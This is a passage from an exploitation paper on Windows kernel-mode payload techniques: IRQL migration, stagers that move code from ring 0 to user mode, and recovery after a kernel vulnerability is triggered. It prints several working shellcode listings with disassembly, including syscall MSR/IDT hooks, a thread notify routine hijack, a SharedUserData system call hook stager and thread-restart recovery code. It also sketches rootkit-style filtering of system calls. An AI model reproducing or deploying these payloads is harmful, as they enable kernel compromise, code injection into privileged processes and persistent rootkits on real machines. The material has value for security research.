Request Levels, also known as +IRQLs. The purpose of IRQLs are to allow the kernel to mask off +interrupts that occur at a lower level than the one that the processor +is currently executing at. This ensures that a piece of code will run +un-interrupted by threads and hardware/software interrupts that have a +lesser priority. It also allows the kernel to define a driver model +that ensures that certain operations are not performed at critical +processor IRQLs. For instance, it is not permitted to block at any IRQL +greater than or equal to DISPATCH_LEVEL. It is also not permitted to +reference pageable memory that has been paged out at greater than or +equal to DISPATCH_LEVEL. + +The reason this is important is because the IRQL that the processor will +be running at when a kernel-mode vulnerability is triggered is highly +dependent upon the area in which the vulnerability occurs. For this +reason, it may be generally necessary to have an approach for either +directly or indirectly lowering the IRQL in such a way that permits the +use of some of the common driver support routines. As an example, it is +not possible to call nt!KeInsertQueueApc at an IRQL greater than +PASSIVE_LEVEL. + +This section will focus on describing methods that could be used to +implement migration payloads. The purpose of a migration payload is to +migrate the processor to an IRQL that will allow payloads to make use of +pageable memory and common driver support routines as described above. +The techniques that can be used to do this vary in terms of stability +and simplicity. It's generally a matter of picking the right one for +the job. + +4.1.1) Direct IRQL Adjustment + + + +---------+------------------+ + | Type: | R0 IRQL Migrator | + | Size: | 6 bytes | + | Compat: | All | + +---------+------------------+ + + +One of the most straight-forward approaches that can be taken to migrate +a payload to a safe IRQL is to directly lower a processor's IRQL. This +approach was first proposed by eEye and involved resolving and calling +hal!KeLowerIrql with the desired IRQL, such as PASSIVE_LEVEL. This +technique is very dangerous due to the way in which IRQLs are intended +to be used. The direct lowering of an IRQL can lead to machine +deadlocks and crashes due to unsafe assumptions about locks being held, +among other things. + +An optimization to the hal!KeLowerIrql technique is to perform the +operation that hal!KeLowerIrql actually performs. Specifically, +hal!KeLowerIrql is a simple wrapper for hal!KfLowerIrql which adjusts +the Irql attribute of the KPCR structure for a specific processor to the +supplied IRQL (as well as calling software interrupt handlers for masked +IRQLs). To implement a payload that migrates to a safe IRQL, all that is +required is to adjust the value at fs:0x24, such as by lowering it to +PASSIVE_LEVEL as shown below In kernel-mode, the fs segment points to the +current processor's KPCR structure. + + +00000000 31C0 xor eax,eax +00000002 64894024 mov [fs:eax+0x24],eax + + +One concern about taking this approach over calling hal!KeLowerIrql is +that the soft-interrupt handlers associated with interrupts that were +masked while at a raised IRQL will not be called. It is unclear whether +or not this could lead to a deadlock, but is theorized that the answer +could be yes. However, the authors did test writing a driver that +raised to HIGHLEVEL, spun for a period of time (during which kb/mouse +interrupts were sent), and then manually adjusted the IRQL as described +above. There appeared to be no adverse side effects, but it has not +been ruled out that a deadlock could be possible Consequently, if anyone +knows a definitive answer to this, the authors would love to hear it. + +Aside from the risks, this approach is nice because it is very small (6 +bytes), so assuming there are no significant problems with it, then the +use of this method would be a no-brainer given the right set of +circumstances for a vulnerability. + +4.1.2) System Call MSR/IDT Hooking + + + +---------+------------------+ + | Type: | R0 IRQL Migrator | + | Size: | 97 bytes | + | Compat: | All | + +---------+------------------+ + +One relatively simple way of migrating a R0 payload to a safe IRQL is by +hooking the function used to dispatch system calls in kernel-mode +through the use of a processor model-specific register. In newer +processors, system calls are dispatched through an improved interface +that takes advantage of a registered function pointer that is given +control when a system call is dispatched. The function pointer is +stored within the STAR model-specific register that has a symbolic code +of 0x176. + +To take advantage of this on Windows XP+ for the purpose payload +migration, all that is required is to first read the current state of +the MSR so that the original system call dispatcher routine can be +preserved. After that, the second stage of the R0 payload must be copied +to another location, preferably globally accessible and unused, such as +SharedUserData or the KPRCB. Once the second stage has been copied, the +value of the MSR can be changed to point to the first instruction of the +now-copied stage. The end result is that whenever a system call is +dispatched from user-mode, second stage of the R0 payload will be +executed as IRQL = PASSIVE. + +For Windows 2000, and for versions of Windows XP+ running on older +hardware, another approach is required that is virtually equivalent. +Instead of changing the processor MSR, the IDT entry for the 0x2e +soft-interrupt that is used to dispatch system calls must be hooked so +that whenever the soft-interrupt is triggered the migrated R0 payload is +called. The steps taken to copy the second stage to another location +are the same as they would be under the MSR approach. + +The following steps outline one way in which a stager of this type could +be implemented for Windows 2000 and Windows XP. + +1. Determining which system call vector to hook. + +By checking KUSER_SHARED_DATA.NtMinorVersion located at 0xffdf0270 for a +value of 0 it is safe to assume the IDT will need to be hooked since the +syscall/sysenter instructions are not used in Windows 2000, otherwise +the hook should be installed in the MSR:0x176 register. Note however +that it is possible Windows XP will not use this method under rare +circumstances. Also an assumption of NtMajorVersion being 5 is made. + +2. Caching the existing service routine address + +If the MSR register is to be hooked the current value can be retrieved +by placing the symbolic code of 0x176 in ecx and using the rdmsr +instruction. The existing value will be returned in edx:eax. If the IDT +entry at index 0x2e is to be hooked it can be retrieved by first +obtaining the processors IDT base using the sidt instruction. The entry +then can be located at offset 0x170 relative to the base since the IDT +is an array of KIDTENTRY structures. Lastly the address of the code +that services the interrupt is in KIDTENTRY with the low word at Offset +and high word at ExtendedOffset. The following is the definition of +KIDTENTRY. + + +DTENTRY ++0x000 Offset : Uint2B ++0x002 Selector : Uint2B ++0x004 Access : Uint2B ++0x006 ExtendedOffset : Uint2B + + +3. Migrating the payload + +A relatively safe place to migrate the payload to is the free space +after the first processors KPCR structure. An arbitrary value of +0xffdffd80 is used to cache the current service routine address and the +remainder of the payload is copied to 0xffdffd84 followed by a an +indirect jump to the original service routine using jmp [0xffdffd80]. +Note that a payload is responsible for maintaining all registers before +calling the original service routine with this implementation. The +payload also may not exceed the end of the memory page, thus limiting +its size to 630 bytes. Historically, R0 shellcode has been put in the +space after SharedUserData since it is exposed to all processes at R3. +However, that could have its disadvantages if the payload has no +requirements to be accessed from R3. The down side is the smaller amount +of free space available. + +4. Hooking the service routine + +Using the same methods described to cache the current service routine +are used to hook. For hooking the IDT, interrupts are temporarily +disabled to overwrite the KIDTENTRY Offset and ExtendedOffset fields. +Disabling interrupts on the current processor will still be safe in +multiprocessor environments since IDTs are maintained on a per processor +basis. For hooking the MSR, the new service routine is placed in edx:eax +(for this case 0x0:0xffdffd84), 0x176 in ecx, and issue a wrmsr +instruction. + + +The following code illustrates an implementation of this type of staging +payload. It's roughly 97 bytes in size, excluding the staged payload and +the recovery method. Removing the support for hooking the IDT entry +reduces the size to roughly 47 bytes. + + +00000000 FC cld +00000001 BF80FDDFFF mov edi,0xffdffd80 +00000006 57 push edi +00000007 6A76 push byte +0x76 +00000009 58 pop eax +0000000A FEC4 inc ah +0000000C 99 cdq +0000000D 91 xchg eax,ecx +0000000E 89F8 mov eax,edi +00000010 66B87002 mov ax,0x270 +00000014 3910 cmp [eax],edx +00000016 EB06 jmp short 0x1e +00000018 50 push eax +00000019 0F32 rdmsr +0000001B AB stosd +0000001C EB3E jmp short 0x5c +0000001E 648B4238 mov eax,[fs:edx+0x38] +00000022 8D4408FA lea eax,[eax+ecx-0x6] +00000026 50 push eax +00000027 91 xchg eax,ecx +00000028 8B4104 mov eax,[ecx+0x4] +0000002B 668B01 mov ax,[ecx] +0000002E AB stosd +0000002F EB2B jmp short 0x5c +00000031 5E pop esi +00000032 6A01 push byte +0x1 +00000034 59 pop ecx +00000035 F3A5 rep movsd +00000037 B8FF2580FD mov eax,0xfd8025ff +0000003C AB stosd +0000003D 66C707DFFF mov word [edi],0xffdf +00000042 59 pop ecx +00000043 58 pop eax +00000044 0404 add al,0x4 +00000046 85C9 test ecx,ecx +00000048 9C pushf +00000049 FA cli +0000004A 668901 mov [ecx],ax +0000004D C1E810 shr eax,0x10 +00000050 66894106 mov [ecx+0x6],ax +00000054 9D popf +00000055 EB04 jmp short 0x5b +00000057 31D2 xor edx,edx +00000059 0F30 wrmsr +0000005B C3 ret ; replace with recovery method +0000005C E8D0FFFFFF call 0x31 + +... R0 stage here ... + +4.1.3) Thread Notify Routine + + + +---------+------------------+ + | Type: | R0 IRQL Migrator | + | Size: | 127 bytes | + | Compat: | 2000, XP | + +---------+------------------+ + + +Another technique that can be used to migrate a payload to a safe IRQL +involves setting up a thread notify routine which is normally done by +calling nt!PsSetCreateThreadNotifyRoutine. Unfortunately, the +documentation states that this routine can only be called at +PASSIVE_LEVEL, thus making it appear as if calling it from a payload +would lead to problems. While this is true, it is also possible to +manually create a notify routine by modifying the global array of thread +notify routines. Although this array is not exported, it is easy to +find by extracting an address reference to it from one of either +nt!PsSetCreateThreadNotifyRoutine or +nt!PsRemoveCreateThreadNotifyRoutine. By using this basic approach, it +is possible to write a migration payload that transitions to +PASSIVE_LEVEL by registering a callback that is called whenever a thread +is created or deleted. + +In more detail, a few steps must be taken in order to get this to work +properly on 2000 and XP. The steps taken on 2003 should be pretty much +the same as XP, but have not been tested. + +1. Find the base address of nt + +The base address of nt must be located so that an exported symbol can be +resolved. + +2. Determine the current operating system + +Since the method used to install the thread notify routines differ +between 2000 and XP, a check must be made to see what operating system +the payload is currently running on. This is done by checking the +NtMinorVersion attribute of KUSER_SHARED_DATA at 0xffdf0270. + +3. Shift edi to point to the storage buffer + +Due to the fact that it can't be generally assumed that the buffer the +payload is running from will stick around until the notify routine is +called, the stage associated with the payload must be copied to another +location. In this case, the payload is copied to a buffer starting at +0xffdf04e0. + +4. If the payload is running on XP + +On XP, the technique used to register the thread notify routine requires +creating a callback structure in a global location and manually +inserting it into the nt!PspCreateThreadNotifyRoutine array. This has +to be done in order to avoid IRQL issues. For that reason, a fake +callback structure is created and is designed to be stored at +0xffdf04e0. The actual code that will be executed will be copied to +0xffdf04e8. The function pointer inside the callback structure is +located at offset 0x4, but in the interest of size, both of the first +attributes are initialized to point to 0xffdf04e8. + +It is also important to note that on XP, the +nt!PspCreateThreadNotifyRoutineCount must be incremented so that the +notify routine will actually be called. Fortunately, for versions of XP +currently tested, this value is located 0x20 bytes after the notify +routine array. + +5. If the payload is running on 2000 + +On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of +function pointers. For that reason, registering the notify routine is +much simpler and can actually be done by calling +nt!PsSetCreateThreadNotifyRoutine without much of a concern since no +extra memory is allocated. By calling the real exported routine +directly, it is not necessary to manually increment the +nt!PspCreateThreadNotifyRoutineCount. Furthermore, doing so would not +be as easy as it is on XP because the count variable is located quite a +distance away from the array itself. + +6. Resolve the exported symbol + +The symbol resolution approach taken in this payload involves comparing +part of an exported symbol's name with ``dNot''. This is done because +on XP, the actual symbol needed in order to extract the address of +nt!PspCreateThreadNotifyRoutine is found a few bytes into +nt!PsRemoveCreateThreadNotifyRoutine. However, on 2000, the address of +nt!PsSetCreateThreadNotifyRoutine needs to be resolved as it is going to +be directly called. As such, the offset into the string that is +compared between 2000 and XP differs. For 2000, the offset is 0x10. +For XP, the offset is 0x13. The end result of the resolution process is +that if the payload is running on XP, the eax register will hold the +address of nt!PsRemoveCreateThreadNotifyRoutine and if it's running on +2000 it will hold the address of nt!PsSetCreateThreadNotifyRoutine. + +7. Copy the second stage payload + +Once the symbol has been resolved, the second stage payload is copied to +the destination described in an earlier step. + +8. Set up the notify routine entry + +If the payload is running on XP, a fake callback structure is manually +inserted into the nt!PspCreateThreadNotifyRoutine array and the +nt!PspCreateThreadNotifyRoutineCount is manually incremented. If the +payload is running on 2000, a direct call to +nt!PsSetCreateThreadNotifyRoutine is issued with the pointer to the +copied second stage as the notify routine to be registered. + +A payload that implements the thread notify routine approach is +shown below: + + +00000000 FC cld +00000001 A12CF1DFFF mov eax,[0xffdff12c] +00000006 48 dec eax +00000007 6631C0 xor ax,ax +0000000A 6681384D5A cmp word [eax],0x5a4d +0000000F 75F5 jnz 0x6 +00000011 95 xchg eax,ebp +00000012 BF7002DFFF mov edi,0xffdf0270 +00000017 803F01 cmp byte [edi],0x1 +0000001A 66D1C7 rol di,1 +0000001D 57 push edi +0000001E 750E jnz 0x2e +00000020 89F8 mov eax,edi +00000022 83C008 add eax,byte +0x8 +00000025 AB stosd +00000026 AB stosd +00000027 57 push edi +00000028 6A06 push byte +0x6 +0000002A 6A13 push byte +0x13 +0000002C EB05 jmp short 0x33 +0000002E 57 push edi +0000002F 6A81 push byte -0x7f +00000031 6A10 push byte +0x10 +00000033 5A pop edx +00000034 31C9 xor ecx,ecx +00000036 8B7D3C mov edi,[ebp+0x3c] +00000039 8B7C3D78 mov edi,[ebp+edi+0x78] +0000003D 01EF add edi,ebp +0000003F 8B7720 mov esi,[edi+0x20] +00000042 01EE add esi,ebp +00000044 AD lodsd +00000045 41 inc ecx +00000046 01E8 add eax,ebp +00000048 813C10644E6F74 cmp dword [eax+edx],0x746f4e64 +0000004F 75F3 jnz 0x44 +00000051 49 dec ecx +00000052 8B5F24 mov ebx,[edi+0x24] +00000055 01EB add ebx,ebp +00000057 668B0C4B mov cx,[ebx+ecx*2] +0000005B 8B5F1C mov ebx,[edi+0x1c] +0000005E 01EB add ebx,ebp +00000060 8B048B mov eax,[ebx+ecx*4] +00000063 01E8 add eax,ebp +00000065 59 pop ecx +00000066 85C9 test ecx,ecx +00000068 8B1C08 mov ebx,[eax+ecx] +0000006B EB14 jmp short 0x81 +0000006D 5E pop esi +0000006E 5F pop edi +0000006F 6A01 push byte +0x1 +00000071 59 pop ecx +00000072 F3A5 rep movsd +00000074 7808 js 0x7e +00000076 5F pop edi +00000077 893B mov [ebx],edi +00000079 FF4320 inc dword [ebx+0x20] +0000007C EB02 jmp short 0x80 +0000007E FFD0 call eax +00000080 C3 ret +00000081 E8E7FFFFFF call 0x6d + +... R0 stage here ... + + +The R0 stage must keep in mind that it will be called in the context +of a callback, so in order to ensure graceful recovery the stage must +issue a ret 0xc or equivalent instruction upon completion. The R0 stage +must also be capable of being re-entered without having any adverse side +effects. This approach may also be compatible with 2003, but tests were +not performed. This payload could be made significantly smaller if it +were targeted to a specific OS version. One major benefit to this +approach is that the stage will be passed arguments that are very useful +for R3 code injection, such as a ProcessId and ThreadId. + +This approach has quite a few cons. First, the size of the payload +alone makes it less useful due to all the work required to just migrate +to a safe IRQL. Furthermore, this payload also relies on offsets that +may be unreliable across new versions of the operating system, +specifically on XP. It also depends on the pages that the notify +routine array resides at being paged in at the time of the registration. +If they are not, the payload will fail if it is running at a raised IRQL +that does not permit page faults. + +4.1.4) Hooking Object Type Initializer Procedures + + +One theoretical way that could be used to migrate to a safe IRQL would +be to hook into one of the generalized object type initializer +procedures associated with a specific object type, such as +nt!PsThreadType or nt!PsProcessType These procedures can be found in the +OBJECTTYPEINITIALIZER structure. The method taken to do this would be to +first resolve one of the exported object types and then alter one of the +procedure attributes, such as the OpenProcedure, to point into a buffer +that contains the payload to execute. The payload could then make a +determination on whether or not it's safe to execute based on the +current IRQL. It may also be safe, in some cases, to to assume that the +IRQL will be PASSIVE_LEVEL for a given object type procedure. Matt +Conover also describes how this can be done in his Malware Profiling and +Rootkit Detection on Windows paper. Thanks to Derek Soeder for +suggesting this approach. + +4.1.5) Hooking KfRaiseIrql + + +This approach was suggested by Derek Soeder could be quite reliable as +an IRQL migration component. The basic concept would be to resolve and +hook hal!KfRaiseIrql. Inside the hook routine, a check could be +performed to see if the current IRQL is passive and, if so, run the rest +of the payload. However, as Derek points out, one of the problems with +this approach would center around the method used to hook the function +considering it'd be somewhat expensive to do a detours-style preamble +hook (although it's fairly easy to disable write protection). Still, +this approach shows a good line of thinking that could be used to get to +a safe IRQL. + +4.2) Stagers + + +The stager payload component is designed to set up the execution of a +separate payload either at R0 or R3. This payload component is pretty +much equivalent to the concept of stagers in user-mode payloads, but +instead of reading in a payload off the wire for execution, R0 stagers +typically have the staged payload tacked on to the stager already since +there is no elegant method of reading in a second stage from the network +without consuming a lot of space in the process. This section will +describe some of the techniques that can be used to execute a stage at +either R0 or R3. The techniques that are theoretical and do not have +proof of concept code will be described as such. + +Although most stagers involve reading more code in off the wire, it +could also be possible to write an egghunt style stager that searches +the address space for an egg that is prepended or appended to the code +that should be executed. The only requirement would be that there be +some way to get the second stage somewhere in the address space for a +long enough period of time. Given the right conditions, this approach +for staging can be quite useful because it reduces the size of the +initial payload that has to be transmitted or included as part of the +exploitation request. + +4.2.1) System Call Return Address Overwrite + + +A potentially useful way to stage code to R3 would be to hook the system +call MSR and then alter the return address of the R3 stack to point to +the stage that is to be executed. This would mean that whenever a +system call occurred, the return path would bounce through the stage and +then into the actual return address. This is an interesting vantage +point for stages because it could give them the ability to filter data +that is passed back to actual processes. This could be potentially make +it possible for an attacker to install a very simple memory-resident +root-kit as a result of taking advantage of a vulnerability. This +approach is purely theoretical, but it is thought that it could be made +to work without very much overhead. + +The basic implementation for such a stager would be to first copy the +staged payload to a globally accessible location, such as +SharedUserData. Once copied, the next step would be to hook the +processor MSR for the system call instruction. The hook routine for the +system call instruction would then alter the return address of the +user-mode stack when called to point to the stage's global address and +should also make it so the stage can restore execution to the actual +return address after it has completed. Once the return address has been +redirected, the actual system call can be issued. When the system call +returns, it would execute the stage. The stage, once completed, would +then restore registers, such as eax, and transfer control to the actual +return address. + +This approach would be very transparent and should be completely +reliable. The added benefits of being able to filter system call +results make it very interesting from a memory-resident rootkit +perspective. + +4.2.2) Thread APC + + +One of the most logical ways to go about staging a payload from R0 to R3 +is through the use of Asynchronous Procedure Calls (APCs). The purpose +of an APC is to allow code to be executed in the context of an existing +thread without disrupting the normal course of execution for the thread. +As such, it happens to be very useful for R0 payloads that want to run +an R3 payload. This is the technique that was discussed at length in +the eEye's paper. A few steps are required to accomplish this. + +First, the R3 payload must be copied to a location that will be +accessible from a user-mode process, such as SharedUserData. After the +copy has completed, the next step is to locate the thread that the APC +should be queued to. There are a few important things to keep in mind in +this step. For instance, it is likely the case that the R3 payload will +want to be run in the context of a privileged process. As such, a +privileged process must first be located and a thread running within it +must be found. Secondly, the thread that will have the APC queued to it +must be in the alertable state, otherwise the APC insertion will fail. + +Once a suitable thread has been located, the final step is to initialize +the APC and point the APC routine to the user-mode equivalent address +via nt!KeInitializeApc and insert it into the thread's APC queue via +nt!KeInsertQueueApc. After that has completed, the code will be run in +the context of the thread that the APC was queued to and all will be +well. + +One of the major concerns about this type of approach is that it will +generally have to rely on undocumented offsets for fields in structures +like EPROCESS and ETHREAD that are very volatile across operating system +versions. As such, making a portable payload that uses this technique +is perfectly feasible, but it may come at the cost of size due to the +requirement of factoring in different offsets and detecting the version +at runtime. + +The approach outlined by eEye works perfectly fine and is well thought +out, and as such this subsection will merely describe ways in which it +might be possible to improve the existing implementation. One way in +which it might be optimized would be to eliminate the call to +nt!PsLookupProcessByProcessId, but as their paper points out, this would +only be possible for vulnerabilities that are triggered outside of the +context of the Idle process. However, for cases where this is not a +limitation, it would be easier to extract the current thread's process +from . This can be accomplished through the following disassembly This +may not be safe if the KPRCB is not located immediately after the KPCR: + + +00000000 A124F1DFFF mov eax,[0xffdff124] +00000005 8B4044 mov eax,[eax+0x44] + + +After the process has been extracted, enumeration to find a privileged +system process could be done in exactly the same manner as the paper +describes (by enumerating the ActiveProcessLinks). + +Another improvement that might be made would be to use SharedUserData as +a storage location for the initialized KAPC structure rather than +allocating storage for it with nt!ExAllocatePool. This would save some +space by eliminating the need to resolve and call nt!ExAllocatePool. +While the approach outlined in the paper describes nt!ExAllocatePool as +being used to stage the payload to an IRQL safe buffer, it would be +equally feasible to do so by using nt!SharedUserData for storage. + +4.2.3) User-mode Function Pointer Hook + + +If a vulnerability is triggered in the context of a process then the +doors open up to a whole wide array of possibilities. For instance, the +FastPebLockRoutine could be hooked to call into some code that is +present in SharedUserData prior to calling the real lock routine. This +is just one example of the different types of function pointers that +could be hooked relative to a process. + +4.2.4) SharedUserData SystemCall Hook + + + +------------+-----------------+ + | Type: | R0 to R3 Stager | + | Size: | 68 bytes | + | Compat: | XP, 2003 | + | Migration: | Not necessary | + +------------+-----------------+ + + +One particularly useful approach to staging a R3 payload from R0 is to +hijack the system call dispatcher at R3. To accomplish this, one must +have an understanding of the basic mechanism through which system calls +are dispatched in user-mode. Prior to Windows XP, system calls were +dispatched through the soft-interrupt 0x2e. As such, the method +described in this subsection will not work on Windows 2000. However, +starting with XP SP0, the system call interface was changed to support +using processor-specific instructions for system calls, such as sysenter +or syscall. + +To support this, Microsoft added fields to the KUSER_SHARED_DATA +structure, which is symbolically known as SharedUserData, that held +instructions for issuing a system call. These instructions were placed +at offset 0x300 by the kernel and took a form like the code shown below: + + +kd> dt _KUSER_SHARED_DATA 0x7ffe0000 +... ++0x300 SystemCall : [4] 0xc819cc3`340fd48b +kd> u SharedUserData!SystemCallStub L3 +SharedUserData!SystemCallStub: +7ffe0300 8bd4 mov edx,esp +7ffe0302 0f34 sysenter +7ffe0304 c3 ret + + +To make use of this dynamic code block, each system call stub in +ntdll.dll was implemented to make a call into the instructions found at +that location. + + +ntdll!ZwAllocateVirtualMemory: +77f7e4c3 b811000000 mov eax,0x11 +77f7e4c8 ba0003fe7f mov edx,0x7ffe0300 +77f7e4cd ffd2 call edx + + +Due to the fact that SharedUserData contained executable instructions, +it was thus necessary that the SharedUserData mapping had to be marked +as executable. When Microsoft began work on some of the security +enhancements included with XP SP2 and 2003 SP1, such as Data Execution +Prevention (DEP), they presumably realized that leaving SharedUserData +executable was largely unnecessary and that doing so left open the +possibility for abuse. To address this, the fields in KUSER_SHARED_DATA +were changed from sets of instructions to function pointers that resided +within ntdll.dll. The output below shows this change: + + + +0x300 SystemCall : 0x7c90eb8b + +0x304 SystemCallReturn : 0x7c90eb94 + +0x308 SystemCallPad : [3] 0 + + +To make use of the function pointers, each system call stub was changed to +issue an indirect call through the SystemCall function pointer: + + +ntdll!ZwAllocateVirtualMemory: +7c90d4de b811000000 mov eax,0x11 +7c90d4e3 ba0003fe7f mov edx,0x7ffe0300 +7c90d4e8 ff12 call dword ptr [edx] + + +The importance behind the approaches taken to issue system calls is that it is +possible to take advantage of the way in which the system call dispatching +interfaces have been implemented. These interfaces can be manipulated in a +manner that allows a payload to be staged from R0 to R3 with very little +overhead. The basic idea behind this approach is that a R3 payload is layered +in between the system call stubs and the kernel. The R3 payload then gets an +opportunity to run prior to a system call being issued within the context of an +arbitrary process. + +This approach has quite a few advantages. First, the size of the staging +payload is relatively small because it requires no symbol resolution or other +means of directly scheduling the execution of code in an arbitrary or specific +process. Second, the staging mechanism is inherently IRQL-safe because +SharedUserData cannot be paged out. This benefit makes it such that a +migration technique does not have to be employed in order to get the R0 payload +to a safe IRQL. + +One of the disadvantages of the payload outlined below is that it relies on +SharedUserData being executable. However, it should be trivial to alter the +PTE for SharedUserData to set the execute bit if necessary, thus eliminating +the DEP concern. + +Another thing to keep in mind about this stager is that the R3 payload must be +written in a manner that allows it to be re-entrant. Since the R3 payload is +layered between user-mode and kernel-mode for system call dispatching, it can +be assumed that the payload will get called many times in many different +process contexts. It is up to the R3 payload to figure out when it should do +its magic and when it should not. + +The following steps outline one way in which a stager of this type could be +implemented. + + +1. Obtain the address of the R3 payload + + +In order to prepare to copy the R3 payload to SharedUserData (or some other +globally-accessible region), the address of the R3 payload must be determined +in some arbitrary manner. + +2. Copy the R3 payload to the global region + + +After obtaining the address of the R3 payload, the next step would be to copy +it to a globally accessible region. One such region would be in +SharedUserData. This requires that SharedUserData be executable. + +3. Determine OS version + + +The method used to layer between system call stubs and the kernel differs +between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or not the +machine is XP SP0/SP1, a comparison can be made to see if the first two bytes +found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp +instruction). If they are equal, then the operating system is assumed to be XP +SP0/SP1. Otherwise, it is assumed to be XP SP2+. + +4. Hooking on XP SP0/SP1 + + +If the operating system version is XP SP0/SP1, hooking is accomplished by +overwriting the first two bytes at 0xffdf0300 with a short jump instruction to +some offset within SharedUserData that is not used, such as 0xffdf037c. Prior +to doing this overwrite, a few instructions must be appended to the copied R3 +payload that act as a method of restoring execution so that the original system +call actually executes. This is accomplished by appending a mov edx, esp / mov +ecx, 0x7ffe0302 / jmp ecx instruction set. + +5. Hooking on XP SP2+ + + +If the operating system version is XP SP2, hooking is accomplished by +overwriting the function pointer found at offset 0x300 within SharedUserData. +Prior to overwriting the function pointer, the original function pointer must +be saved and an indirect jmp instruction must be appended to the copied R3 +payload so that system calls can still be processed. The original function +pointer can be saved to 0xffdf0308 which is currently defined as being used for +padding. The jmp instruction can therefore indirectly acquire the original +system call dispatcher address from 0x7ffe0308. + + +The following code illustrates an implementation of this type of staging +payload. It's roughly 68 bytes in size, excluding the R3 payload and the +recovery method. + + +00000000 EB3F jmp short 0x41 +00000002 BB0103DFFF mov ebx,0xffdf0301 +00000007 4B dec ebx +00000008 FC cld +00000009 8D7B7C lea edi,[ebx+0x7c] +0000000C 5E pop esi +0000000D 57 push edi +0000000E 6A01 push byte +0x1 ; number of dwords to copy +00000010 59 pop ecx +00000011 F3A5 rep movsd +00000013 B88BD4B902 mov eax,0x2b9d48b +00000018 663903 cmp [ebx],ax +0000001B 7511 jnz 0x2e +0000001D AB stosd +0000001E B803FE7FFF mov eax,0xff7ffe03 +00000023 AB stosd +00000024 B0E1 mov al,0xe1 +00000026 AA stosb +00000027 66C703EB7A mov word [ebx],0x7aeb +0000002C 5F pop edi +0000002D C3 ret ; substitute with recovery method +0000002E 8B03 mov eax,[ebx] +00000030 8D4B08 lea ecx,[ebx+0x8] +00000033 8901 mov [ecx],eax +00000035 66C707FF25 mov word [edi],0x25ff +0000003A 894F02 mov [edi+0x2],ecx +0000003D 5F pop edi +0000003E 893B mov [ebx],edi +00000040 C3 ret ; substitute with recovery method +00000041 E8BCFFFFFF call 0x2 + +... R3 payload here ... + +4.3) Recovery + + +Another distinction between kernel-mode vulnerabilities and user-mode +vulnerabilities is that it is not safe to simply let the kernel crash. If the +kernel crashes, the box will blue screen and the payload that was transmitted +may not even get a chance to run. As such, it is necessary to identify ways in +which normal execution can be resumed after a kernel-mode vulnerability has +been triggered. However, like most things in the kernel, the recovery method +that can be used is highly dependent on the vulnerability in question, so it +makes sense to have a few possible approaches. Chances are, though, that the +methods listed in this document will not be enough to satisfy every situation +and in many cases may not even be the most optimal. For this reason, +kernel-mode exploit writers are encouraged to research more specific recovery +methods when implementing an exploit. Regardless of these concerns, this +section describes the general class of recovery payloads and identifies +scenarios in which they may be most useful. + +4.3.1) Thread Spinning + + +For situations where a vulnerability occurs in a non-critical kernel thread, it +may be possible to simply cause the thread to spin or block indefinitely. This +approach is very useful because it means that there is no requirement to +gracefully restore execution in some manner. It basically skirts the issue of +recovery altogether. + +4.3.1.1) Delaying Thread Execution + + +This method was proposed by eEye and involved using nt!KeDelayExecutionThread +as a way of blocking the calling thread without adversely impacting +performance. Alternatively, if nt!KeDelayExecutionThread failed or returned, +eEye implemented their payload in such a way as to cause it to spin while +calling nt!KeYieldExecution each iteration. The approach that eEye suggests is +perfectly fine, assuming the following minimum conditions are true: + + + - Non-critical kernel thread + - No exclusive locks (such as spin locks) are held by a calling frame + + +If any one of these conditions is not true, the act of spinning or otherwise +blocking the thread from continuing normal execution could lead to a deadlock. +If the setting is right, though, this method is perfectly acceptable. If the +approach described by eEye is used, it will require the resolution of +nt!KeDelayExecutionThread at a minimum, but could also require the resolution +of nt!KeYieldExecution depending on how robust the recovery method is intended +to be. The fact that this requires symbol resolution means that the payload +will jump significantly in size if it does not already involve the resolution +of symbols. + +4.3.1.2) Spinning the Calling Thread + + + +---------------+--------------------+ + | Type: | R0 Recovery | + | Size: | 2 bytes | + | Compat: | All | + | Migration: | May be required | + | Requirements: | No held locks | + +---------------+--------------------+ + +An alternative approach is to just spin the calling thread at PASSIVE_LEVEL. +If the conditions are right, this should not lead to a deadlock, but it is +likely that performance will be adversely affected. The benefit is that it +does not increase the size of the payload by much considering such an approach +can be implemented in two bytes: + + +00000000 EBFE jmp short 0x0 + + +4.3.2) Throwing an Exception + + + +---------------+---------------------------------+ + | Type: | R0 Recovery | + | Size: | 3 bytes | + | Compat: | All | + | Migration: | Not necessary | + | Requirements: | No held locks in wrapped frame | + +---------------+---------------------------------+ + + +If a vulnerability occurs in the context of a frame that is wrapped in an +exception handler, it may be possible to simply trigger an exception that will +allow execution to continue like normal. Unfortunately, the chances of this +recovery method being usable are very slim considering most vulnerabilities are +likely to occur outside of the context of an exception wrapped frame. The +usability of this approach can be tested fairly simply by triggering the +overflow in such a way as to cause an exception to be thrown. If the machine +does not crash, it could be the case that the vulnerability occurred in a +function that is wrapped by an exception handler. Assuming this is the case, +writing a payload that simply triggers an exception is fairly trivial. + + +00000000 31F6 xor esi,esi +00000002 AC lodsb + + +4.3.3) Thread Restart + + + +---------------+---------------------+ + | Type: | R0 Recovery | + | Size: | 41 bytes | + | Compat: | 2000, XP | + | Migration: | May be required | + | Requirements: | No held locks | + +---------------+---------------------+ + + +If a vulnerability occurs in the context of a system worker thread, it may be +possible to cause the thread to restart execution at its entry point without +any major adverse side effects. This avoids the issue of having to restore +normal execution for the context of the current call frame. To accomplish +this, the StartAddress must be extracted from the calling thread's ETHREAD +structure. Due to the fact that this relies on the use of undocumented fields, +it follows that portability could be a problem. The following table shows the +offsets to the StartAddress routine for different operating system versions: + + + +------------------+---------------------+----------------------+ + | Platform | StartAddress Offset | Stack Restore Offset | + +------------------+---------------------+----------------------+ + | Windows 2000 SP4 | 0x230 | 0x254 | + | Windows XP SP0 | 0x224 | 0x250 | + | Windows XP SP2 | 0x224 | 0x250 | + +------------------+---------------------+----------------------+ + + +A payload that implements this approach that should be compatible with all of +the above described offsets is shown below. Testing was only performed on XP +SP0: + + +00000000 6A24 push byte +0x24 +00000002 5B pop ebx +00000003 FEC7 inc bh +00000005 648B13 mov edx,[fs:ebx] +00000008 FEC7 inc bh +0000000A 8B6218 mov esp,[edx+0x18] +0000000D 29DC sub esp,ebx +0000000F 01D3 add ebx,edx +00000011 803D7002DFFF01 cmp byte [0xffdf0270],0x1 +00000018 7C07 jl 0x21 +0000001A 8B03 mov eax,[ebx] +0000001C 83EC2C sub esp,byte +0x2c +0000001F EB06 jmp short 0x27 +00000021 8B430C mov eax,[ebx+0xc] +00000024 83EC30 sub 